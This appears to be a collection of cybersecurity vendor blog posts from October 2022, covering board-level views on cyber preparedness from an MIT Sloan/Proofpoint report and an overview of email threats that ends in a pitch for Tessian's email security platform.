Finally, we were delighted to welcome our keynote speaker and guest, Helen Rabe, CISO at the BBC. Large enterprises like the BBC are high-value targets for attackers. In this wide-ranging talk, Helen explains her approach to cybersecurity and details what it takes to be a successful and savvy security leader.
Advanced Email Threats
Board Members Believe Their Companies Are Unprepared For A Cyberattack
by Andrew Webb Friday, October 21st, 2022
As our recent webinar discussed, cybersecurity has become a C-suite issue. Any successful attack will need input from all its executive members: the CEO for steadying the ship and communicating to investors and the Board, the CISO, CIO, CFO and COO to respond and deal with the actual breach and ensure business continuity. Then there is also the fine balancing act of strategic PR and media communications. Consequently, cyberattack resilience and response should be on the agenda of every company’s monthly or quarterly Board meeting. Boards can provide the oversight companies need in planning and executing their security strategy. Although Board members might not always understand the technical fundamentals of cybersecurity, recent headlines mean they at least understand the financial implications of a cybersecurity breach. So it’s all roses, right? Well not so much. A recent report from MIT Sloan and Proofpoint reveals that many Board members feel their companies are woefully under-prepared for a cyberattack. What’s more, there is a large disconnect between what the Board wants to prioritize and what Chief Information Security Officers (CISOs) view as important. Here then, are some of the key takeouts.
First the good news: The report found that 77% of Board members agree that cybersecurity is a top priority for their board. Now the not-so-good news. Although most Board members are aware of the risk of cyber attacks, that hasn’t translated into preparedness. Forty-seven percent of all Board members believe that their organization is unprepared for a cyber attack, and about the same amount of CISOs agree. As discussed, CISOs & Board Members disagree on the most critical consequences of a cybersecurity incident. Internal data becoming public is of the most concern for boards while CISOs are more worried about significant downtime and disruption of operations. In reality, both are a problem for organizations. The report specifically highlights the Board’s approach to the number one cause of cyber attacks. Two-thirds (67%) believe human error is their biggest cyber vulnerability and notes that ‘… people throughout the organization, including board members, know what to watch for and what to do should they encounter a questionable email, link or website. Board members have both a personal and professional role to play. They, too, can be targets of cyber criminals who want to get into companies. We’ve seen this across many senior levels in organizations: where the c-suite themselves are at much higher risk of an attack than many ordinary employees because they rely much more on power dynamics. So what’s the answer to this mismatch between the Board, the C-suite, and the CISO?
Firstly, as the report notes, Board members in most countries had markedly different perceptions of cyber risk than their CISOs. That can be addressed through dialogue and better communication. Crucially though, those conversations must approach the issue from a business angle, rather than purely a technological one.  Secondly, on the human error piece, CISOs must put in place not only technological solutions, but also the cultural framework that makes security an ‘always on’ issue for the company and staff. We addressed exactly this aspect in our recent Security Cultures Report, which offers advice on how to bake better security awareness into your staff’s day-to-day routine.  Thirdly, harness the power of the Board. If leaders and parts of the business see cybersecurity as a top priority for the Board, then they’ll do the same. One easy way to do this is to make cybersecurity an agenda item at every monthly or quarterly Board meeting, and establish good cyber metrics to help track your progress.
Insider Risks, Email DLP, Advanced Email Threats
What is email security and why it’s important
by Thursday, October 20th, 2022
Fact: email is responsible for up to 90% of breaches, consequently email security is at the core of keeping your organization and its data safe and secure. As cyber risk continues to increase, having robust email threat prevention in place can make the difference in preventing threat actors from gaining a foothold and establishing initial access. It can also provide critical visibility and control over data within the organization, significantly reducing insider risk.
Why email security deserves greater attention
It might seem like a basic question, but when you drill into what email security is and what it entails, it is fundamentally about data security. The typical organization sends and receives hundreds and thousands of emails on a monthly basis, which explains why email is regarded as the lifeblood of organizations. From a security standpoint, the critical data transportation role played by email helps explain why email security is increasingly being regarded as one of the cornerstones of data security. Another security consideration is the open architecture character of email – making email an accessible attack vector. Anyone can send an email to any individual or organization, making the threat vector extremely attractive to exploit. Want to email the CEO of a company? Their name is probably in the public domain and so their email is likely to be firstname.lastname@companyname.com or some combination thereof.
Email cyber risks are increasing
The open nature of email explains why threat actors are continuously at work in developing email-based social engineering campaigns. These campaigns are developed by using open-source information sources such as social media accounts, company PR statements and news mentions. Recent research also points to threat actors mining dark web data dumps obtained from previous breaches for personally identifiable information (PII) to be used in impersonation campaigns. Another attack vector that is gaining prominence is credential related compromises. A credential compromise that leads to an account takeover (ATO) of a vendor in the supply chain or even an internal email account is particularly challenging to detect. Threat actors typically leverage ATO for purposes of carrying out second stage attacks that can include email requests for invoices to be paid (invoice fraud), or delivering a malicious payload via email. Insider threats within organizations present another threat vector on email. In fact, until the recent roll-out of behavioral-based data loss prevention (DLP), being able to detect and prevent data loss on email was near impossible. The challenge with data loss on email is that it can occur in a multitude of seemingly innocuous ways, for example, an employee attaching the incorrect file and sending this out via email, or sending the email to the unintended recipient. More malicious acts of insider threat could include a disgruntled employee that exfiltrates sensitive company data via email, or a threat actor that has gained access via an impersonation or ATO attack.
Rule-based solutions no longer provide adequate protection
Threat actors can bypass rule-based email security controls like Secure Email Gateways (SEGs) that rely on a threat detection engine of already documented indicators of compromise. Relying on them effectively means chancing your email security on a threat detection approach built on established indicators of compromise – with no protective capability against zero day attacks. We know that threat actors don’t work this way. Threat actors are continuously refining their attack campaigns. The result is that social engineering attack campaigns are becoming ever-more sophisticated and are increasingly able to bypass rule-based detection systems. Some of the tried and tested methods for compromise include creating spoofed domains, leveraging compromised accounts, as well as procuring a wide array of exploit kits on the dark web. Phishing-as-a-Service (PhaaS) is now sold alongside Ransomware-as-a-Service (RaaS) on the dark web. The commercialization of these exploit kits and threat actors’ services are removing the barriers to entry for carrying out attacks. On the PhaaS front, the most recent offering is the so-called Caffeine PhaaS exploit kit that enables anyone to procure the kit and launch phishing attacks against targets. The service offering includes pre-built phishing templates, available in multiple languages.
The time for advanced email protection is now
No organization can afford to neglect increasing email security risk. Only by leveraging behavioral based cybersecurity solutions will advanced email attacks be detected and prevented. This includes insider threats that lead to data loss. Tessian’s Intelligent Cloud Email Security Platform has behavioral intelligence at its core – using Natural Language Processing (NLP) and Natural Language Understanding (NLU) – to detect advanced external and internal threats, as they manifest and in real-time. This includes threats that have been able to circumvent rule-based security controls such as SEGs.